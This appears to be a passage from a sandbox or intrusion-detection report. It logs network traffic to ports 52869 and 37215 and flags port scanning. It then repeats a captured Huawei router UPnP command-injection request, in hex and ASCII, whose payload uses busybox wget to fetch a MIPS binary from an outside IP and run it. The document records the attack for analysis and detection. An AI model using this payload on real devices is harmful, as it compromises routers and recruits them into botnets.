Source: unknown	Network traffic detected: HTTP traffic on port 39962 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52840 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39962 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56974 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39962 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53548 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52840 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54444 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41320 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36956 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54170 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36988 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 36956
Source: unknown	Network traffic detected: HTTP traffic on port 54186 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39962 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 36988
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54170 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54186 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57432 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46606 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54170 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52840 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54186 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41876 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55658 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39962 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46704 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40286 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37674 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57422 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56974 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36528 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54186 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37674 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40286 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46018 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46020 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59968 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53548 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55412 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36528 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43896 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43902 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41286 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 43896
Source: unknown	Network traffic detected: HTTP traffic on port 52840 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 43902
Source: unknown	Network traffic detected: HTTP traffic on port 34766 -> 52869

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 185.101.117.1 ports 2,5,6,8,9,52869

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 